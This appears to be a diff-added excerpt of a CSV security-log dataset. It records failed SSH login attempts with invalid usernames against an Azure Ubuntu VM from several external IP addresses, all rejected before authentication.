+16126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:50,UbuntuDevEnv,2019-06-26 06:50:49,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 59618:11: Bye Bye [preauth],35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,59618,,
+16127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:50,UbuntuDevEnv,2019-06-26 06:50:49,auth,UbuntuDevEnv,info,Disconnected from invalid user mysftp 46.101.149.230 port 59618 [preauth],35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysftp,46.101.149.2,59618,,
+16128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:56,UbuntuDevEnv,2019-06-26 06:50:56,auth,UbuntuDevEnv,info,Invalid user ubuntu from 139.99.98.248 port 36244,35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,139.99.98.2,36244,,
+16129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:56,UbuntuDevEnv,2019-06-26 06:50:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:56,UbuntuDevEnv,2019-06-26 06:50:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:58,UbuntuDevEnv,2019-06-26 06:50:57,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 139.99.98.248 port 36244 ssh2,35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,139.99.98.2,36244,,
+16132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:58,UbuntuDevEnv,2019-06-26 06:50:57,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 139.99.98.248 port 36244 [preauth],35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,139.99.98.2,36244,,
+16133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:58,UbuntuDevEnv,2019-06-26 06:50:57,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 36244:11: Bye Bye [preauth],35043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,36244,,
+16134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:59,UbuntuDevEnv,2019-06-26 06:50:58,auth,UbuntuDevEnv,info,Invalid user tigrou from 64.202.187.152 port 55112,35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,64.202.187.1,55112,,
+16135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:59,UbuntuDevEnv,2019-06-26 06:50:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:59,UbuntuDevEnv,2019-06-26 06:50:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:01,UbuntuDevEnv,2019-06-26 06:51:00,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 64.202.187.152 port 55112 ssh2,35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,64.202.187.1,55112,,
+16138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:01,UbuntuDevEnv,2019-06-26 06:51:00,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 64.202.187.152 port 55112 [preauth],35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,64.202.187.1,55112,,
+16139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:01,UbuntuDevEnv,2019-06-26 06:51:00,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 55112:11: Bye Bye [preauth],35056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,55112,,
+16140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:16,UbuntuDevEnv,2019-06-26 06:51:16,auth,UbuntuDevEnv,info,Invalid user weblogic from 87.101.240.10 port 38076,35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,87.101.240.1,38076,,
+16141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:16,UbuntuDevEnv,2019-06-26 06:51:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:16,UbuntuDevEnv,2019-06-26 06:51:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:19,UbuntuDevEnv,2019-06-26 06:51:18,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 87.101.240.10 port 38076 ssh2,35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,87.101.240.1,38076,,
+16144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:19,UbuntuDevEnv,2019-06-26 06:51:18,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 38076:11: Bye Bye [preauth],35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,38076,,
+16145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:51:19,UbuntuDevEnv,2019-06-26 06:51:18,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 87.101.240.10 port 38076 [preauth],35120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,87.101.240.1,38076,,
+16146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:06,auth,UbuntuDevEnv,info,Invalid user admin from 138.68.29.52 port 38726,35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,38726,,
+16147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:07,auth,UbuntuDevEnv,info,Invalid user wn from 45.59.69.138 port 47044,35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wn,45.59.69.1,47044,,
+16150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:07,UbuntuDevEnv,2019-06-26 06:52:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:08,auth,UbuntuDevEnv,info,Failed password for invalid user wn from 45.59.69.138 port 47044 ssh2,35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wn,45.59.69.1,47044,,
+16153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:08,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 47044:11: Bye Bye [preauth],35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,47044,,
+16154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:08,auth,UbuntuDevEnv,info,Disconnected from invalid user wn 45.59.69.138 port 47044 [preauth],35297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wn,45.59.69.1,47044,,
+16155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:09,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 138.68.29.52 port 38726 ssh2,35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,38726,,
+16156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:09,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 38726:11: Bye Bye [preauth],35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,38726,,
+16157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:09,UbuntuDevEnv,2019-06-26 06:52:09,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 138.68.29.52 port 38726 [preauth],35294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,38726,,
+16158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:27,UbuntuDevEnv,2019-06-26 06:52:27,auth,UbuntuDevEnv,info,Invalid user dev from 64.202.187.152 port 44314,35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,64.202.187.1,44314,,
+16159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:27,UbuntuDevEnv,2019-06-26 06:52:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:27,UbuntuDevEnv,2019-06-26 06:52:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:29,UbuntuDevEnv,2019-06-26 06:52:29,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 64.202.187.152 port 44314 ssh2,35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,64.202.187.1,44314,,
+16162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:30,UbuntuDevEnv,2019-06-26 06:52:29,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 44314:11: Bye Bye [preauth],35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,44314,,
+16163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:30,UbuntuDevEnv,2019-06-26 06:52:29,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 64.202.187.152 port 44314 [preauth],35375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,64.202.187.1,44314,,
+16164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:38,UbuntuDevEnv,2019-06-26 06:52:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.200.84  user=root,35409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,167.99.200.8,,0,
+16165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:39,UbuntuDevEnv,2019-06-26 06:52:39,auth,UbuntuDevEnv,info,Failed password for root from 167.99.200.84 port 46830 ssh2,35409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.99.200.8,46830,,
+16166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:39,UbuntuDevEnv,2019-06-26 06:52:39,auth,UbuntuDevEnv,info,"Received disconnect from 167.99.200.84 port 46830:11: Normal Shutdown, Thank you for playing [preauth]",35409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.99.200.8,46830,,
+16167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:39,UbuntuDevEnv,2019-06-26 06:52:39,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 167.99.200.84 port 46830 [preauth],35409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,167.99.200.8,46830,,
+16168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:40,UbuntuDevEnv,2019-06-26 06:52:40,auth,UbuntuDevEnv,info,Invalid user cyril from 139.99.98.248 port 53396,35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,139.99.98.2,53396,,
+16169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:40,UbuntuDevEnv,2019-06-26 06:52:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:40,UbuntuDevEnv,2019-06-26 06:52:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:42,UbuntuDevEnv,2019-06-26 06:52:42,auth,UbuntuDevEnv,info,Failed password for invalid user cyril from 139.99.98.248 port 53396 ssh2,35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,139.99.98.2,53396,,
+16172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:42,UbuntuDevEnv,2019-06-26 06:52:42,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 53396:11: Bye Bye [preauth],35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,53396,,
+16173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:52:42,UbuntuDevEnv,2019-06-26 06:52:42,auth,UbuntuDevEnv,info,Disconnected from invalid user cyril 139.99.98.248 port 53396 [preauth],35414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,139.99.98.2,53396,,
+16174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:03,UbuntuDevEnv,2019-06-26 06:53:02,auth,UbuntuDevEnv,info,Invalid user wp from 46.101.149.230 port 48514,35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,46.101.149.2,48514,,
+16175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:03,UbuntuDevEnv,2019-06-26 06:53:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:03,UbuntuDevEnv,2019-06-26 06:53:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:05,UbuntuDevEnv,2019-06-26 06:53:04,auth,UbuntuDevEnv,info,Failed password for invalid user wp from 46.101.149.230 port 48514 ssh2,35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,46.101.149.2,48514,,
+16178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:05,UbuntuDevEnv,2019-06-26 06:53:04,auth,UbuntuDevEnv,info,Disconnected from invalid user wp 46.101.149.230 port 48514 [preauth],35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,46.101.149.2,48514,,
+16179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:05,UbuntuDevEnv,2019-06-26 06:53:04,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 48514:11: Bye Bye [preauth],35500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,48514,,
+16180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:21,UbuntuDevEnv,2019-06-26 06:53:20,auth,UbuntuDevEnv,info,Invalid user ghm from 87.101.240.10 port 55328,35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,87.101.240.1,55328,,
+16181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:21,UbuntuDevEnv,2019-06-26 06:53:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:21,UbuntuDevEnv,2019-06-26 06:53:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:23,UbuntuDevEnv,2019-06-26 06:53:22,auth,UbuntuDevEnv,info,Failed password for invalid user ghm from 87.101.240.10 port 55328 ssh2,35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,87.101.240.1,55328,,
+16184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:23,UbuntuDevEnv,2019-06-26 06:53:22,auth,UbuntuDevEnv,info,Disconnected from invalid user ghm 87.101.240.10 port 55328 [preauth],35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,87.101.240.1,55328,,
+16185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:53:23,UbuntuDevEnv,2019-06-26 06:53:22,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 55328:11: Bye Bye [preauth],35560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,55328,,
